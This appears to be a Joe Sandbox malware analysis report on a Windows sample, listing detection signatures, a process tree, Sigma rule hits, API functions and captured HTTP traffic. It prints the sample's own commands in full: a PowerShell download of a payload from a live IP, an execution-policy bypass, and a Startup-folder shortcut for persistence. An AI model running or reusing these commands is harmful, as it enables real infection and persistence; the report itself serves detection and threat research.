Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PPbimZI4LV.exe

Overview

General Information

Sample name:PPbimZI4LV.exe
renamed because original name is a hash value
Original sample name:3e60030e11271225fcc4e95aeb70447577882c697b54eeb83d5b6957b9c4bda3.exe
Analysis ID:1577201
MD5:a9e7a83dd50b78bad39a2a57cbebb137
SHA1:c8634886fe1f814033d5303a29ed28909b8cea91
SHA256:3e60030e11271225fcc4e95aeb70447577882c697b54eeb83d5b6957b9c4bda3
Tags:139-99-188-124exeuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • PPbimZI4LV.exe (PID: 6096 cmdline: "C:\Users\user\Desktop\PPbimZI4LV.exe" MD5: A9E7A83DD50B78BAD39A2A57CBEBB137)
    • powershell.exe (PID: 1472 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7496 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Guard.exe (PID: 7808 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 7884 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 8040 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 8136 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • svchost.exe (PID: 4092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7496, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7808, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7496, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7808, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 7884, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7496, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 1472, ProcessName: powershell.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8040, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1472, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7496, ProcessName: powershell.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8040, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 8136, ProcessName: SwiftWrite.pif
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1472, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 1472, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 1472, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 1472, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8040, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PPbimZI4LV.exe", ParentImage: C:\Users\user\Desktop\PPbimZI4LV.exe, ParentProcessId: 6096, ParentProcessName: PPbimZI4LV.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 1472, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4092, ProcessName: svchost.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7884, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://139.99.188.124/BlQMSgJx.txtAvira URL Cloud: Label: malware
Source: PPbimZI4LV.exeVirustotal: Detection: 27%Perma Link
Source: PPbimZI4LV.exeReversingLabs: Detection: 42%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: PPbimZI4LV.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_00007FF64399C7C0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,1_2_00007FF6439AA4F8
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A6428 FindFirstFileW,FindNextFileW,FindClose,1_2_00007FF6439A6428
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,1_2_00007FF6439AA350
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00007FF6439AA874
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643962F50 FindFirstFileExW,1_2_00007FF643962F50
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_00007FF6439A72A8
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A71F4 FindFirstFileW,FindClose,1_2_00007FF6439A71F4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00007FF64399B7C0
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF64399BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00007FF64399BC70
Source: C:\Users\Public\Guard.exeCode function: 11_2_00154005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00154005
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0015494A
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0015C2FF
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015CD14 FindFirstFileW,FindClose,11_2_0015CD14
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0015CD9F
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0015F5D8
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0015F735
Source: C:\Users\Public\Guard.exeCode function: 11_2_0015FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0015FA36
Source: C:\Users\Public\Guard.exeCode function: 11_2_00153CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00153CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C44005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00C44005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_00C4494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00C4C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_00C4CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4CD14 FindFirstFileW,FindClose,17_2_00C4CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00C4F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00C4F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C4FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00C4FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C43CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00C43CE2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 08:19:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 03 Dec 2024 12:54:38 GMTETag: "da2a8-6285d2afd80b6"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 0d 00 00 04 00 00 15 cd 0d 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc d0 0b 00 7c 01 00 00 00 90 0c 00 50 d7 00 00 00 00 00 00 00 00 00 00 00 86 0d 00 a8 1c 00 00 00 70 0d 00 ac 71 00 00 90 3b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5b 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 e7 08 00 00 10 00 00 00 e8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e fd 02 00 00 00 09 00 00 fe 02 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 00 0c 00 00 52 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 d7 00 00 00 90 0c 00 00 d8 00 00 00 3c 